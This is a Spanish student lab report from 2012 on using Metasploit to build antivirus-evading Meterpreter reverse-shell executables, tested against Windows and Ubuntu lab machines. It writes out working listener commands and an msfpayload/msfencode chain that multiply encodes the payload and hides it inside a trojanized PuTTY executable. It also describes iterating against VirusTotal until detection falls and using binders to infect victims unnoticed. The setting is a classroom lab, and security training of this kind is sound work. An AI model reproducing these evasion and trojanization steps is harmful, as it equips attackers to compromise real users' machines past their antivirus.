2012

METASPLOIT
PRACTICA 4 MALWARE INDETECTABLE CONTRA ANTIVIRUS Y SISTEMAS

Javier Garca Cambronel SEGUNDO DE ASIR 25/01/2012

[METASPLOIT] 25 de enero de 2012

INTRODUCCION
EQUIPOS DE PRUEBAS

CREANDO UN EXPLOIT INDETECTABLE

CDIGO EXPLOIT CAMBIO EN EL EXPLOIT PARA QUE FUNCIONE COMPILACION DEL EXPLOIT PREGUNTAS DEL EXPLOIT PROCESO DE COMPILACIN NO ES ORO TODO LO QUE RELUCE TODAVIA QUEDA TRABAJO MS MODIFICACIONES EN NUESTRO CDIGO DEL EXPLOIT TODO TRABAJO TIENE SU RECOMPENSA

EJECUCION DE LOS ATAQUES

EXPLOIT WINDOWS XP SP2 EXPLOIT EN WINDOWS XP SP3 CON AVAST EXPLOIT EN WINDOWS 7 64BITS SP1 CON NOD32 EXPLOIT EN UBUNTU 11.04

CAMUFLANDO EXPLOIT EN UN PROGRAMA

WINDOWS 7 32BITS SP1 LINUX SE PUEDE INFECTAR DE VIRUS A TRAVS DE WINE

CONCLUSIONES REFERENCIAS (WEBGRAFA)

SEGUNDO DE ASIR

Pgina 1

[METASPLOIT] 25 de enero de 2012

INTRODUCCION
QUE ES UN ANTIVIRUS?
Es un programa creado para prevenir o evitar la activacin de los virus, as como su propagacin y contagio. Cuenta adems con rutinas de detencin, eliminacin y reconstruccin de los archivos y las reas infectadas del sistema. Un antivirus tiene tres principales funciones y componentes:

VACUNA es un programa que instalado residente en la memoria, acta como "filtro" de los programas que son ejecutados, abiertos para ser ledos o copiados, en tiempo real. DETECTOR, que es el programa que examina todos los archivos existentes en el disco o a los que se les indique en una determinada ruta o PATH. Tiene instrucciones de control y reconocimiento exacto de los cdigos virales que permiten capturar sus pares, debidamente registrados y en forma sumamente rpida desarman su estructura. ELIMINADOR es el programa que una vez desactivada la estructura del virus procede a eliminarlo e inmediatamente despus a reparar o reconstruir los archivos y reas afectadas.

Es importante aclarar que todo antivirus es un programa y que, como todo programa, slo funcionar correctamente si es adecuado y est bien configurado. Adems, un antivirus es una herramienta para el usuario y no slo no ser eficaz para el 100% de los casos, sino que nunca ser una proteccin total ni definitiva.

SEGUNDO DE ASIR

Pgina 2

[METASPLOIT] 25 de enero de 2012

EQUIPOS DE PRUEBAS
EQUIPO VICTIMA WINDOWS XP SP2
La direccin IP de nuestro equipo victima1 ser la que vemos en la imagen 192.168.1.35

PROTECCIN NOD 32 5.9.5 ACTUALIZADO 29/01/2012

ESET NOD32 AntiVirus es un antivirus de calidad y eficacia realmente impresionantes, con una certeza prcticamente absoluta de que en cada una de sus versiones detectar cualquier virus conocido y, mediante una heurstica compleja, por conocer. En conjunto ESET NOD32 AntiVirus es un antivirus de primera calidad, compitiendo entre los mejores en la mayora de las facetas de estos indispensables de los usuarios, aunque en la velocidad y la total deteccin basa toda su potencia, destacando del resto. Esta versin de ESET NOD32 AntiVirus se adapta a las ltimas tendencias en lo que a interfaz grfica se refiere. La nueva interfaz, aunque en ingls, es fcil de usar a ms no poder, y cuenta con dos modos: normal y avanzado.

Heurstica avanzada Anlisis muy rpidos Consumo de memoria reducido Proteccin mediante contrasea Exportacin de la configuracin Inspector de sistema y actividad Pgina 3

SEGUNDO DE ASIR

[METASPLOIT] 25 de enero de 2012 EQUIPO VICTIMA WINDOWS XP SP3

La direccin IP de nuestro equipo victima ser la que vemos en la imagen 192.168.1.36

PROTECCION AVAST 6.0.1367 ACTUALIZADO 29/01/2012 Las novedades de la versin 6 La sexta edicin de avast! Free Antivirus presenta pocos cambios estticos en comparacin con la anterior, pero ampla an ms el abanico de la proteccin gratuita. A los escudos de la versin 5 se aaden los de scripts y comportamiento. Y con el mdulo AutoSandbox, avast! Free Antivirus impide que programas potencialmente dainos puedan afectar el sistema.La gran novedad de avast! Free Antivirus 6 es WebRep, el complemento para Firefox, Chrome e Internet Explorer que comprueba la reputacin de una pgina a partir de las valoraciones de los usuarios. Tres barras coloreadas indican la calidad del sitio y hay recuadros para clasificar el sitio web en distintas categoras. Es un sistema eficaz y abierto a las contribuciones de los usuarios. Lo cierto es que ningn antivirus gratuito ofrece tanto como avast! Free Antivirus. Traducido y apoyado por una inmensa comunidad de usuarios, se postula como el antivirus gratuito por excelencia.

Ocho escudos de proteccin en tiempo real Defensa proactiva con el escudo conductual Sandbox para ejecutar software sospechoso Mdulo de reputacin web Pgina 4

SEGUNDO DE ASIR

[METASPLOIT] 25 de enero de 2012

PROTECCION 2 IOBIT MALWARE

IObit Malware Fighter protege el ordenador frente a programas espa, troyanos, adware y otros tipos de software maligno que suele atacar el sistema a travs de pginas web, correos y descargas. La tarjeta de presentacin de IObit Malware Fighter es impecable: una ventana elegante, un consumo de memoria contenido y ocho escudos de proteccin en tiempo real. Por si no bastara, IObit ha aadido DOG, una nariz electrnica capaz de encontrar malware desconocido a partir de varios criterios. Es todo oro lo que reluce? En nuestras pruebas, IObit Malware Fighter ha sido eficaz y rpido, detectando amenazas al instante y guardando los archivos en cuarentena; a veces, en las redes de IObit Malware Fighter ha cado incluso publicidad normal y corriente. Si te quedaran dudas acerca de la peligrosidad de un archivo, IObit Malware Fighter puede subirlo a IObit Cloud, su servicio de anlisis "en la Nube". Es un buen aadido para este antiespas eficaz y ligero.

Proteccin en tiempo real rpida y eficaz Deteccin de amenazas desconocidas Envo de archivos sospechosos a IObit Cloud Excelente diseo de interfaz

SEGUNDO DE ASIR

Pgina 5

[METASPLOIT] 25 de enero de 2012 EQUIPO VICTIMA WINDOWS 7 PROFESSIONAL 32BITS

La direccin IP de nuestro equipo victima ser la que vemos en la imagen 192.168.1.37

PROTECCION KASPERSKY INTERNET SECURITY 2012 ACTUALIZADO 29/01/2012

Kaspersky Internet Security 2012 brinda una proteccin superior contra virus, troyanos, spam, hackers y otros. Su foco en la seguridad digital, que incluye sistemas hbridos de ltima generacin, combina innovadoras tecnologas en la nube con una avanzada proteccin antivirus para garantizar una respuesta ms rpida y efectiva contra las amenazas modernas que siempre estn en constante desarrollo. T, al igual que tus datos privados y tu PC, estn bajo completa proteccin cuando trabajas, realizas transacciones bancarias, compras online o juegas en Internet.

SEGUNDO DE ASIR

Pgina 6

[METASPLOIT] 25 de enero de 2012 EQUIPO VICTIMA WINDOWS 7 PROFESSIONAL 64BITS

La direccin IP de nuestro equipo victima ser la que vemos en la imagen 192.168.1.34

PROTECCIN NOD 32 5.9.5 ACTUALIZADO 29/01/2012

ESET NOD32 AntiVirus es un antivirus de calidad y eficacia realmente impresionantes, con una certeza prcticamente absoluta de que en cada una de sus versiones detectar cualquier virus conocido y, mediante una heurstica compleja, por conocer. En conjunto ESET NOD32 AntiVirus es un antivirus de primera calidad, compitiendo entre los mejores en la mayora de las facetas de estos indispensables de los usuarios, aunque en la velocidad y la total deteccin basa toda su potencia, destacando del resto. Esta versin de ESET NOD32 AntiVirus se adapta a las ltimas tendencias en lo que a interfaz grfica se refiere. La nueva interfaz, aunque en ingls, es fcil de usar a ms no poder, y cuenta con dos modos: normal y avanzado.

Heurstica avanzada Anlisis muy rpidos Consumo de memoria reducido Proteccin mediante contrasea Exportacin de la configuracin Inspector de sistema y actividad Pgina 7

SEGUNDO DE ASIR

[METASPLOIT] 25 de enero de 2012 EQUIPO VICTIMA UBUNTU 11.04 32BITS

La direccin IP de nuestro equipo victima ser la que vemos en la imagen 192.168.1.37

SIN PROTECCION ANTIVIRUS

SEGUNDO DE ASIR

Pgina 8

[METASPLOIT] 25 de enero de 2012

CREANDO UN EXPLOIT INDETECTABLE

Despus de mucho buscar recogemos el cdigo del exploit, para compilarlo nosotros mismos no sin antes echarle un vistazo ante problemas que pudieran surgir y ver cmo podramos solucionarlos.

CDIGO EXPLOIT
Lo podemos descargar desde el siguiente enlace http://pastebin.com/7xmvGnks

Hay que tener en cuenta que si lo dejamos tal como esta nos dar el siguiente error y el archivo ejecutable que nos de. No servir para nada

SEGUNDO DE ASIR

Pgina 9

[METASPLOIT] 25 de enero de 2012

CAMBIO EN EL EXPLOIT PARA QUE FUNCIONE

Si nos fijamos en el error que da si no modificamos nada del cdigo como podemos ver en diversos tutoriales como el siguiente. http://www.flu-project.com/backdoor-indetectable-generado-con-metasploit.html Es un error en la Validacin de Lhost, o lo que es lo mismo, de nuestro ordenador, entonces lo ms normal, seria mirar el cdigo y ms concretamente la parte donde introducimos los datos de nuestra IP Antes estaba configurado as

As nos quedara despus de hacer el cambio pertinente para que funcione el script, es decir, haciendo que el script lea la direccin IP cuando la introducimos, La asigne el valor correcto a la variable y no tengamos ningn problema.

SEGUNDO DE ASIR

Pgina 10

[METASPLOIT] 25 de enero de 2012

Ahora lo siguiente que tenemos que hacer, es ejecutar el siguiente comando en nuestra terminal para que podamos compilarlo correctamente, pues la verdad es un exploit muy complejo, del cual ya veremos sus ventajas. apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

COMPILACION DEL EXPLOIT

Bueno, ahora que estamos listos para compilarlo ya ya hemos echado un vistazo al cdigo del exploit, lo que hacemos ser guardarlo lo guardamos con el nombre de vanish.sh que para eso han sido los creadores. Una vez creado y guardado, lo pegamos en la ruta donde se encuentran los exploits, y algunos diris cul es esa ruta? Pues depende desde donde estes ejecutando metasploit, yo lo estoy ejecutando desde Backtrack aunque supongo que ya lo habais adivinado con las capturas que llevamos hasta aqu y encima para no conseguir nada de nada. Bueno sin ms dilaciones la ruta es la siguiente: pentest/exploits/framework Nos vamos a sistema de archivos despus a la carpeta pentest, seguidamente a la carpeta exploits y por ltimo a la carpeta framework desde la line de comandos lo haramos situndonos donde est el archivo y con la opcin move y la ruta que he dicho anteriormente. Una vez que lo hemos copiado, nos situamos desde la terminal en la ruta donde esta nuestro exploit cd /pentest/exploits/framework Y ejecutamos para darnos permisos chmod + vanish.sh y lo siguiente para ejecutar dicho script sh vanish.sh SEGUNDO DE ASIR Pgina 11

[METASPLOIT] 25 de enero de 2012

PREGUNTAS DEL EXPLOIT

Como podemos ver nos hace una serie de preguntas. TARJETA DE RED: Detecta nuestras tarjetas de red, es decir, la interfaz y nosotros tendremos que elegir la que tenemos activa, con nuestra ip, si dudamos de cual es abrir otro terminal y escribir ifconfig. PUERTO DE ESCUCHA: Entonces lo siguiente que nos preguntar es porque puerto queremos hacer la conexin, nosotros escogemos el puerto 3222, para escoger un puerto ,lo mejor que podemos hacer si dudamos, es escoger uno que ya este escuchando, para as no tener ningn problema, esto se hace con el comando netstat l, para ver los puertos que estn escuchando actualmente en nuestro equipo. NMERO DE INICIALIZACIN ALEATORIO: Este nmero nos sirve a la hora de compilar el exploit y va a indicar la forma y el tamao en que se crea el script, haciendo un cdigo completamente nico, Apuntar que cuanto ms valor le demos al a este nmero ms ocupar el ejecutable que creemos. NMERO DE VECES A CODIFICAR: Pasaremos ahora por los codificadores y seleccionamos, el nmero de veces que pasaremos sobre estos, sobre un mximo de 20. NUESTRA IP: Por ltimo lo que tenemos que hacer es poner nuestra IP y esperar.

SEGUNDO DE ASIR

Pgina 12

[METASPLOIT] 25 de enero de 2012

PROCESO DE COMPILACIN
Veremos, que cuando lo estamos creando y se est codificando nuestro ordenador puede tardar un poco en responder, esto es porque para realizar este proceso, el uso de la CPU llegar al 100% y se mantendr hasta que termine la operacin.

Como vemos se llevaran acabo las codificaciones indicadas y se ejecutara una vez creado automticamente.

Una vez terminada la aplicacin veremos que se abre automticamente una el payload con la direccin IP de nuestro ordenador y el puerto donde est escuchando.

SEGUNDO DE ASIR

Pgina 13

[METASPLOIT] 25 de enero de 2012

NO ES ORO TODO LO QUE RELUCE TODAVIA QUEDA TRABAJO

Una vez llegado este momento es donde nuestra vctima tendra que ejecutar el .exe que hemos creado. Dnde se encuentra este ejecutable? Se crea donde habamos metido el exploit para compilarlo, en una carpeta llamada seclabs.

MS MODIFICACIONES EN NUESTRO CDIGO DEL EXPLOIT

Habr que realizar esta operacin unas cuantas veces jugando con los valores de nmero de inicializacin aleatorio y tamao y como no MODIFICAR EL EXPLOIT A MANO UN POQUITO COMO EN ESTE CASO. Nos desplazamos a la parte del exploit que se dedica a la codificacin.

Introducimos ms codificadores para hacer de nuestro cdigo un cdigo nico

SEGUNDO DE ASIR

Pgina 14

[METASPLOIT] 25 de enero de 2012

TODO TRABAJO TIENE SU RECOMPENSA

Despus de Realizar una y otra vez los cambios pertinentes citados en el caso anterior vamos comprobando subiendo a virustotal el resultado final.

Vemos como cambiando los valores tanto de inicializacin como de tamao el hash del virus, cambia lo suficiente como para ser detectado por muchos menos

Cambiando un poco el cdigo y volvindolo un poco ms sencillo volvemos a mejorar los resultados.

SEGUNDO DE ASIR

Pgina 15

[METASPLOIT] 25 de enero de 2012

Hasta que damos con uno lo suficientemente BUENO cercano a la PERFECCION.

EJECUCION DE LOS ATAQUES

NUESTRA PRIMERA VICTIMA WINDOWS XP SP2
Como vemos en la siguiente ventana no se ha encontrado ningn virus es ms directamente es capaz de evitar el anlisis si nos fijamos bien.

SEGUNDO DE ASIR

Pgina 16

[METASPLOIT] 25 de enero de 2012

Podemos pulsar en mostrar el registro a peticin del usuario y vemos los detalles.

Entonces ahora lo que hacemos es ejecutar el archivo malicioso, que para ms INRI, tiene el nombre de Backdoor.exe una vez ejecutado el archivo.

Vemos como hemos creado sesin en el equipo de la vctima, recordemos que este tiene WINDOWS XP SP2 y el antivirus, completamente actualizado.

SEGUNDO DE ASIR

Pgina 17

[METASPLOIT] 25 de enero de 2012

Siempre que quisiramos esperar una respuesta de nuevo de esa puerta trasera,para una nueva vctima o para esta misma siempre y cuando no hayamos migrado a un proceso de la mquina vcitima, cosa que recomiendo una vez abierta la sesin de meterpreter. Si no, ejecutaramos el siguiente cdigo y abriramos de nuevo la sesin al abrir el archivo. Y para ver que esto es as hacemos una captura de pantalla desde nuestra sesin de meterpreter. msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 E

SEGUNDO DE ASIR

Pgina 18

[METASPLOIT] 25 de enero de 2012 EXPLOIT EN WINDOWS XP SP3 CON AVAST

Como podemos ver, nuestro antivirus en este caso avast, se encuentra en su ltima versin y completamente actualizado

Realizamos los anlisis pertinentes y vemos que no detecta ninguna amenaza

Probamos con el Anti Malware instalado en el equipo y vemos que tambin nos dice que no tiene ninguna amenaza.

SEGUNDO DE ASIR

Pgina 19

[METASPLOIT] 25 de enero de 2012

Sin embargo vemos que al ejecutar el archivo y este no tener ningn certificado o al menos a eso se lo achaco yo, nos dice que podra ser una aplicacin potencialmente insegura recomendndolo abrir en SANDBOX y nos avisa de que cualquier dato salvado se perder al cerrarlo. Bueno pues vamos a ver como es de seguro dicho SandBox.

Ejecutamos el archivo y como podemos ver hacemos una captura de pantalla en la que podemos ver el equipo vctima y lo que esta haciendo en ese momento, lo realmente importante no es esta captura de pantalla, sino que tendremos acceso total al ordenador.

SEGUNDO DE ASIR

Pgina 20

[METASPLOIT] 25 de enero de 2012 EXPLOIT EN WINDOWS 7 64BITS SP1 CON NOD32

Como vemos hemos podido completamente con los dos Windows XP y los resultados que nos ha arrojado el EXPLOIT analizndolo con VIRUSTOTAL son muy buenos.Lo que vamos a hacer ahora es proceder con un sistema operativo WINDOWS7 con Service Pack1 instalado y actualizado a 20-01-2012. Volvemos a ejecutar el comando para que se cargue nuestro payload handler msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 E y se quede esperando la conexin, hasta que claro, alguien ejecute nuestro archivo, en este caso ese alguien voy a ser yo desde mi equipo anfitrin. Vemos que al introducirnos en el USB donde tenemos el archivo con el MALWARE no nos dice nada el antivirus, entonces lo que vamos a hacer es doble click

SEGUNDO DE ASIR

Pgina 21

[METASPLOIT] 25 de enero de 2012

Al ejecutarlo, vemos que se crea la sesin perfectamente y podramos migrar a un proceso, para tener una puerta trasera permanente a este equipo. Como vemos para ver que esto se ha realizado correctamente hemos hecho una captura de pantalla desde METERPRETER con el comando screenshot. Y en ella podemos ver hasta la propia ventana de la mquina virtual donde hemos realizado el ataque y las otras en las que estamos realizando las pruebas.

SEGUNDO DE ASIR

Pgina 22

[METASPLOIT] 25 de enero de 2012 EXPLOIT EN UBUNTU 11.04

En esta prueba, vamos a ver como la frase de que Linux no tiene virus cae por su propio peso. Lo primero que tenemos que tener en cuenta, para realizar este ataque, es que Linux por defecto no es capaz de ejecutar un archivo con extensin .exe Entonces lo que vamos a tener que hacer es hacer dicho exploit en otra extensin que si que reconozca Linux. Y sea capaz de ejecutarla sin ningn problema por ejemplo la extensin .run MODIFICANDO DE NUEVO NUESTRO EXPLOIT Para hacer el exploit ejecutable en Linux tenemos que volver al cdigo de nuestro exploit e ir a la parte de compilacin, para que la conversin se realice en vez de a un archivo.exe a uno que sea .run Nos tendra que quedar algo como la siguiente imagen.

Una vez guardados los cambios procedemos de nuevo a su compilacin vista anteriormente en este trabajo. Pulsa aqu para volver a revisar como llevar a cabo dicho proceso. Una vez compilado podemos ver que resultados obtenemos en virus total, aunque en realidad para esta prueba no tiene demasiada importancia, Pues nuestro Ubuntu no tiene ningn antivirus instalado.

Para ver el informe completo de deteccin pinchar sobre el siguiente enlace https://www.virustotal.com/file/b04588b64c7fc06cbf38898e6cc9e065e09d01d7d997ad59ec a25a2b2669ace8/analysis/1328463333/

SEGUNDO DE ASIR

Pgina 23

[METASPLOIT] 25 de enero de 2012

ATACANDO UBUNTU Como nuestro exploit ya esta creado y camuflado en un RUN. Nos metemos en nuestra mquina atacante (backtrack5) y ejecutamos el siguiente comando desde la consola msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 E

Veremos algo como la siguiente imagen, esperando a que el archivo malicioso sea ejecutado

Nos vamos al archivo que hemos introducido mediante un USB

Vamos a sus propiedades y marcamos la opcin que vemos en la pantalla para que nos permita ejecutar el archivo con un doble click

SEGUNDO DE ASIR

Pgina 24

[METASPLOIT] 25 de enero de 2012

Acto seguido ejecutamos el archivo, volvemos a la mquina atacante y como vemos la sesin se ha creado perfectamente.

Una vez hemos tomado el control, podemos hacer lo que queramos en la vctima, aqu hemos listado todos los archivos de la raz de dicho sistema.

SEGUNDO DE ASIR

Pgina 25

[METASPLOIT] 25 de enero de 2012

CAMUFLANDO EXPLOIT EN UN PROGRAMA

Despues de probar diversos JOINER con el que mejor resultados he obtenido es con el propio de metasploit, eso si previamente hay que actualizar metasploit, pero que son los joiner? programas que son muy interesantes para infectar inadvertidamente a la vctima con virus y troyanos. Un binder (tambin llamado Joiner o Juntador) es un programa que une dos o ms archivos. Estos archivos pueden ser ejecutables o de cualquier otro tipo dependiendo del binder que usemos. Hay ciertas normas que nunca se pueden violar en este tipo de uniones de archivos. Por ejemplo, podemos unir un archivo *.exe a un archivo *.jpg. Esta unin es factible en binders como el Juntador Beta, pero el resultado nunca podr ser un archivo *.jpg. Si bien un archivo de imagen podra ocultar un ejecutable en su interior, nunca podramos ejecutar el ejecutable al picar sobre la imagen. Hay que tener en cuenta que antes de nada, (s que lo he dicho antes, pero en realidad es muy importante) tendremos que actualizar nuestro metasploit, para que todos los mdulos estn en la ltima versin y ejecutar un cdigo ms o menos como este donde las codificaciones abunden tanto en calidad como en cantidad msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 R | msfencode -e x86/shikata_ga_nai -c 114 -t raw | msfencode -e x86/alpha_upper -c 25 -t raw | msfencode e x86/shikata_ga_nai -c 114 -t raw | msfencode -e x86/countdown -c 114 -t exe -o /tmp/puttynuevo.exe -k -x /tmp/putty.exe -e x86/shikata_ga_nai -c 114

Despus de ejecutar el anterior comando y de que nuestro programa se cree con la cantidad de codificaciones que le hemos metido (las cuales tardarn un rato) lo subimos como ya seguro os lo habis aprendido a virustotal. Y vemos que los resultados que nos arroja, si bien, no son perfectos. No son nada malos partiendo de la base de que de esos 10 motores de bsqueda pertenecen a Antivirus poco conocidos y que los grandes como McAfee, Karpersky, Norton, Avast no los detectan. De todas formas este ejecutable lo podramos guardar y crear otro con el mismo exploit, que no fuera detectado por algunos de estos 10 que lo detectan, y asi con dos o tres ejecutables diferentes utilizando el dado para la ocasin saltarnos cualquier antivirus.

SEGUNDO DE ASIR

Pgina 26

[METASPLOIT] 25 de enero de 2012 WINDOWS 7 32BITS SP1

He utilizado Kaspersky para esta prueba y en su versin ms completa y actualizada por ser considerado por muchos y por otra parte no les falta razn (debido a su heurstica avanzada entre otras cosas) como el mejor antivirus. Bueno, al grano en estas pruebas no he repetido los pasos de nuevo por no excederme en volver a reiterar las mismas, pero el equipo atacante est escuchando esperando a que el archivo malicioso sea ejecutado. Como vemos hemos analizado Puttynuevo.exe y no nos ha detectado ninguna amenaza. Y como vemos tambin en la misma ventana hemos ejecutado el archivo malicioso y se nos ha abierto el programa putty, pero claro.se habr creado nuestra sesin?

SEGUNDO DE ASIR

Pgina 27

[METASPLOIT] 25 de enero de 2012

Como podemos ver hemos hecho una captura de pantalla y en ella podemos ver en nuestro navegador Firefox de nuestro backtrack la captura de pantalla que acabamos de realizar sobre el equipo vctima.

SEGUNDO DE ASIR

Pgina 28

[METASPLOIT] 25 de enero de 2012 LINUX SE PUEDE INFECTAR DE VIRUS A TRAVS DE WINE

El desarrollo del servicio de la capa de compatibilidad de aplicaciones de Windows sobre Linux, Wine, ha avanzado tanto que ya es posible que los programas que corran sobre Wine se infecten por un virus de Windows, cosa que no suceder con los programas del sistema operativo GNU/Linux. Ya no estamos hablando de virus hacia un sistema operativo, que tambin, si no directamente virus que afecten a programas concretos y que gracias a ellos podamos tomar el control de un sistema operativo diferente para el que fueron programados. INSTALANDO WINE EN UBUNTU Lo primero que debemos hacer es instalar WINE un programa que nos permite ejecutar casi cualquier programa hecho para Windows lo hacemos, con el siguiente comando.

En el mismo proceso de instalacin podemos ver la siguiente ventana en la que tendremos que aceptar los trminos de la licencia.

Aceptamos para proceder a la instalacin

SEGUNDO DE ASIR

Pgina 29

[METASPLOIT] 25 de enero de 2012

Y esperamos hasta que la instalacin finaliza con xito

Lo siguiente que debemos hacer es ejecutar el comando desde la terminal winecfg esperar a que se lleven a cabo una serie de procesos y nos salga la ventana de configuracin donde podremos configurar, como el sistema operativo de Microsoft a emular y diferentes cosas, nosotros lo dejamos como viene por defecto.

ATACANDO UBUNTU MEDIANTE WINE Como nuestro exloit ya esta creado y camuflado en un EXE. Nos metemos en nuestra mquina atacante (backtrack5) y ejecutamos el siguiente comando desde la consola msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.39 LPORT=3222 E

Veremos algo como la siguiente imagen, esperando a que el archivo malicioso sea ejecutado

SEGUNDO DE ASIR

Pgina 30

[METASPLOIT] 25 de enero de 2012

Con el botn derecho sobre el archivo le damos a abrir con Wine cargador de programas de Windows

Como podemos ver, la sesin se crea perfectamente y si hacemos un SYSINFO nos dice que esta corriendo un Windows XP SP3 Pues es el sistema operativo al que esta emulando Wine

Tambin podemos hacer un ls para mirar los archivos de la raz y como vemos tenemos control completo de Linux.

SEGUNDO DE ASIR

Pgina 31

[METASPLOIT] 25 de enero de 2012

Como podemos ver tambin en la siguiente imagen si hacemos un IPCONFIG dentro de Merterpreter, nos da los mismos datos que tenemos con IFCONFIG desde el propio Linux, tanto la direccin IP como la direccin MAC.

SEGUNDO DE ASIR

Pgina 32

[METASPLOIT] 25 de enero de 2012

CONCLUSIONES
Las actualizaciones de Sistemas operativos y todo tipo de software como los antivirus son muy importantes. MANTENTE ACTUALIZADO. Ninguna proteccin es definitiva, pero si se mejora algo nuestra seguridad. Nunca debemos dar informacin del software instalado en nuestro equipo (sobretodo antivirus) Linux tambin es vulnerable y debido a que mucha gente piensa que no lo es, no tienen software antivirus en su distribucin (GRAN ERROR)

REFERENCIAS (WEBGRAFA)
http://www.flu-project.com/backdoor-indetectable-generado-con-metasploit.html

http://thehackerway.com/2011/04/07/payloads-metasploit-framework/

http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html

http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

http://vishnuvalentino.com/computer/hacking-windows-xp-sp3-via-ms11-006-windowsshell-graphvulnerability/

SEGUNDO DE ASIR

Pgina 33